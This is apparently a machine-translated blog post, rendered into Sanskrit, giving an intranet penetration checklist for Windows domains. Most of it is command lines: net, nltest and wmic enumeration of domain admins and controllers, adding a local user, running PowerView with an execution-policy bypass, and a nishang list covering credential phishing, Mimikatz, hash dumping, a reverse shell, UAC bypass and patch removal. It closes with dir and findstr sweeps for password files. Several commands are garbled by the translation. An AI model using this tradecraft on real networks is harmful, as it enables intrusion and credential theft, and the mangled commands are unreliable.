2024-07-12
한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina
चत्वारि परिस्थितयः : १.
1. स्थानीयः उपयोक्ता: उपयोक्ता
2. स्थानीयप्रशासकप्रयोक्ता: गृहसंस्करणे अक्षमः, केवलं सर्वरे एव उपलब्धः
3. डोमेनस्य अन्तः उपयोक्तारः
4. डोमेन प्रशासक
साधारणाः स्थानीयप्रयोक्तारः डोमेनसूचनाः प्राप्तुं न शक्नुवन्ति
स्थानीयप्रशासकप्रयोक्तारः प्रत्यक्षतया प्रणालीप्रयोक्तृभ्यः (डोमेन्-अन्तर्गत-उपयोक्तृभ्यः) स्व-अधिकारं वर्धयितुं डोमेन-अन्तर्गतं सूचनां प्राप्तुं च शक्नुवन्ति ।
1. डोमेनः अस्ति वा इति निर्धारयन्तु : १.
1. डोमेन् पश्यन्तु: ipconfig/all अथवा systeminfo अथवा net config workstation
ipconfig /all: क्षेत्रं प्राप्तम्: hack.com
systeminfo: प्राप्तं डोमेन् अस्ति: hack.com
2. डोमेनस्य DNS होस्ट् पश्यन्तु: nslookup डोमेननाम (hack.com)
3.Net time /domain त्रीणि परिस्थितयः
डोमेन् अस्ति, परन्तु वर्तमानः उपयोक्ता डोमेन् उपयोक्ता नास्ति
डोमेन् अस्ति तथा वर्तमानः उपयोक्ता डोमेन् उपयोक्ता अस्ति
वर्तमानजालवातावरणं कार्यसमूहः अस्ति तथा च कोऽपि डोमेनः नास्ति
1.net view: डोमेनसूचीं, सङ्गणकसूचीं, निर्दिष्टं सङ्गणकसाझीकृतसंसाधनं प्रदर्शयन्तु: net view (सङ्गणकसूचीं प्रदर्शयन्तु) net view \computer (निर्दिष्टं साझासङ्गणकं पश्यन्तु)
net view /domain:domain name (hack) (सङ्गणकसूचीं प्रदर्शयतु)
2.net user to view local users: net user /domain इत्यनेन द्रष्टुं शक्यते यत् डोमेने कति उपयोक्तारः सन्ति
उपयोक्तारं योजयतु: शुद्धप्रयोक्तृनाम (प्रशासक) गुप्तशब्दः (123)/जोडतु
3.net use: सङ्गणकं संयोजयन्तु अथवा सङ्गणकं साझासंसाधनात् विच्छेदयन्तु, सङ्गणकसंयोजनसूचना प्रदर्शयन्तु
4.net time: सङ्गणकानां अथवा डोमेनानां समन्वयनार्थं समयस्य उपयोगं कुर्वन्तु: net time \computer net time /domain
5.net start: सेवां आरभत, अथवा आरब्धं सेवां प्रदर्शयन्तु: net start service
6.net pause: चलन्तीं सेवां विरामयतु: net pause service
7.net continue: सेवां पुनः सक्रियं कुर्वन्तु: net continue service
8.net stop: विण्डोज NT/2000/2003 सेवां स्थगयन्तु: net stop service
9.net share: साझासंसाधनं विलोपयन्तु, रचयन्तु, प्रदर्शयन्तु वा
10.net session: स्थानीयसङ्गणकस्य सत्रं तया सह सम्बद्धानां क्लायन्ट्-समूहानां च सूचीं कुर्वन्तु अथवा विच्छेदयन्तु:
net session //computer (सूचीकृतं वा सत्रं कर्तुं वा सङ्गणकं चिनोति)
net session //computer delete (निर्दिष्टसङ्गणकस्य सत्रं विच्छेदं कुर्वन्तु)
11.net localgroup सङ्गणकसमूहं पश्यन्तु (केवलं स्थानीये प्रयोज्यम्): net localgroup उपयोक्तृनाम
डोमेन उपयोक्ता: net localgroup उपयोक्तृनाम/डोमेन
12.net group डोमेन् मध्ये समूहस्य नाम पृच्छति (केवलं डोमेन् नियन्त्रकाणां कृते प्रयोज्यम्): net group /domain
13.net config वर्तमानकाले प्रचलितानि विन्यासयोग्यानि सेवानि प्रदर्शयति, अथवा सेवायाः विन्यासं प्रदर्शयति परिवर्तयति च (स्थानीयरूपेण):
net config (चलितसेवाः प्रदर्शयति) net config services (सेवानां सूचीं प्रदर्शयति)
14.net computer डोमेनदत्तांशकोशात् सङ्गणकान् योजयन्तु अथवा विलोपयन्तु:
net computer \computername /add अथवा /del (प्रवेशक्षेत्रे सङ्गणकान् योजयितुं वा विलोपयितुं वा)
यदि "अस्य कार्यसमूहस्य सर्वरसूची सम्प्रति अनुपलब्धा अस्ति" इति दृश्यते तर्हि सेवाः सक्षमाः कुर्वन्तु: सर्वरः, कार्यस्थानकं, सङ्गणकब्राउजर्, अग्निप्रावरणं च बन्दं कुर्वन्तु ।
डोमेन् पश्यन्तु: ipconfig/all अथवा systeminfo अथवा net config कार्यस्थानम्
डोमेनस्य DNS होस्ट् पश्यन्तु: nslookup डोमेननाम (hack.com)
क्वेरी डोमेन: net view /domain
डोमेन् मध्ये सर्वेषां सङ्गणकानां प्रश्नं कुर्वन्तु: net view /domain:domain name
डोमेन् मध्ये सर्वेषां उपयोक्तृसमूहानां सूचीं पृच्छन्तु: net group /domain
सर्वेषां डोमेन सदस्यानां सङ्गणकसूचीं पृच्छन्तु: net group "domain computers" /domain
डोमेन् मध्ये गुप्तशब्दसूचना पृच्छन्तु: net accounts /domain
डोमेनविश्वाससूचना प्राप्नुवन्तु: nltest /domain_trusts
डोमेन नियन्त्रकस्य नाम पश्यन्तु: nltest /DCLIST:hack
यन्त्रनाम पश्यन्तु, IP अन्वेष्टुम्, ping/nslookup: ping/nslookup डोमेन नियन्त्रकस्य नाम
कदाचित् ping निष्क्रियं भवति अत्र nslookup इत्यस्य उपयोगं कुर्वन्तु ।
डोमेन नियन्त्रकं मेजबाननाम पश्यन्तु: nslookup ‐type=SRV _ldap._tcp
वर्तमानसमयं पश्यन्तु: net time /domain
डोमेन नियन्त्रकसमूहं पश्यन्तु: net group "Domain Controllers" /domain
1. डोमेन् मध्ये उपयोक्तृसूचनाः पृच्छन्तु: net user /domain
2. स्थानीय उपयोक्तारः पश्यन्तु: wmic useraccount get name डोमेन उपयोक्तारः: wmic useraccount get domain,name
स्थानीयः उपयोक्ता : १.
डोमेन उपयोक्ता : १.
3. विद्यमानप्रयोक्तृणां जाँचं कुर्वन्तु: dsquery उपयोक्ता (कदाचित् एतत् निष्पादितं न भवेत् तथा च केवलं सर्वरयन्त्रे चालयितुं शक्यते)
4. स्थानीयप्रशासकप्रयोक्तृसमूहस्य प्रश्नं कुर्वन्तु: net localgroup administrators
5. डोमेन प्रशासक उपयोक्तृभ्यः प्रश्नं कुर्वन्तु: net group "domain admins" /domain
6. डोमेन प्रशासक उपयोक्तृसमूहं पृच्छन्तु: net group "Enterprise Admins" /domain
अत्र द्वौ साधनौ आवश्यकौ स्तः
प्रथमं सर्वरे टूल् अपलोड् कृत्वा ततः निष्पादयन्तु
1.PVEFindADUser: PVEFindADUser.exe -current (मार्गं द्रष्टव्यम्) एतत् साधनं सङ्गणके के उपयोक्तारः प्रवेशं कृतवन्तः इति परीक्षितुं शक्नोति, येन अस्मान् डोमेनप्रशासकं अन्वेष्टुं शक्यते
2.powerView स्क्रिप्ट्: .
powershell.exe ‐exec bypass ‐command "& { आयात‐मॉड्यूल .PowerView.ps1;Invoke‐UserHunter}" इति ।
प्रथमं अनुमतिः पश्यन्तु: Get-ExecutionPolicy
चालननीतिं परिवर्तयन्तु: Set-ExecutionPolicy Unrestricted (केवल Unrestricted अनुमतिः pow निष्पादयितुं शक्नोति)
nishang tool (पूर्वलेखे डाउनलोड् लिङ्क् अस्ति):
CS निर्देशिकायां स्थापयित्वा प्रत्यक्षतया आयातयन्तु: powershell-import nishang/nishang.psm1
निष्पादयन्तु: powershell आदेशः
केचन सामान्यतया प्रयुक्ताः आदेशाः : १.
Check-VM: होस्ट् वर्चुअल् मशीन् अस्ति वा इति पश्यन्तु
Invoke-CredentialsPhish: उपयोक्तारं स्वस्य गुप्तशब्दं प्रविष्टुं छलं कुर्वन्तु
Get-WLAN-Keys: wifi सूचना
Invoke-Mimikatz: गुप्तशब्दान् गृह्यताम्
Get-PassHashes: हैश प्राप्तुम्
Get-PassHints: उपयोक्तुः गुप्तशब्दसंकेतसूचनाः प्राप्नुवन्तु
Invoke-PowerShellTcp: पुनः बन्दः शेल्
आह्वान-PsUACme: UAC बाईपास
Remove-Update: पट्टिकां निष्कासयन्तु
Get-Information: स्थानीयसूचना
उदाहरणम् : powershell Check-VM
1. निर्दिष्टनिर्देशिकासु विविधाः संवेदनशीलसञ्चिकाः संग्रहयन्तु
dir /a /s /bd:"*.txt"।
दिर /क /स /ख C:"*.xlsx"।
दिर /क /स /बद्:"*.मद्"।
दिर /क /स /बड:"*.sql"।
दिर /क /स /बड:"*.pdf"
dir /a /s /bd:"*.docx"।
dir /a /s /bd:"*.doc"।
दिर /क /स /बड:"* कन्फ*"।
दिर /क /स /बद्:"*बक*"।
दिर /क /स /बड:"*पवड*"।
दिर /क /स /बद्:"*पास*"।
dir /a /s /bd:"* प्रवेश*"।
dir /a /s /bd:"*उपयोक्ता*"।
2. निर्दिष्टनिर्देशिकायां सञ्चिकाभ्यः विविधानि खातागुप्तशब्दानि संग्रहयन्तु
findstr /si पास *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si userpwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si लॉगिन *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si उपयोक्ता *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
उदाहरणम् : dir /a /s /bd:"*.txt"।
सः ३० वर्षाणाम् अधिकं कालात् प्रौद्योगिक्याः शोधकार्यं कर्तुं समर्पितः अस्ति, तथा च जावा, लिनक्स, जावास्क्रिप्ट्, php, css इत्यादिषु विविधभाषासु प्रवीणः अस्ति, मुक्तस्रोतक्षेत्रे सः बहु योगदानं कृतवान् अस्ति विकासक दस्तावेजीकरणस्थानकं भविष्ये सन्दर्भार्थं प्रौद्योगिकीविकासे केचन विषयाः साझां कर्तुं सर्वे तत् पश्यन्तु
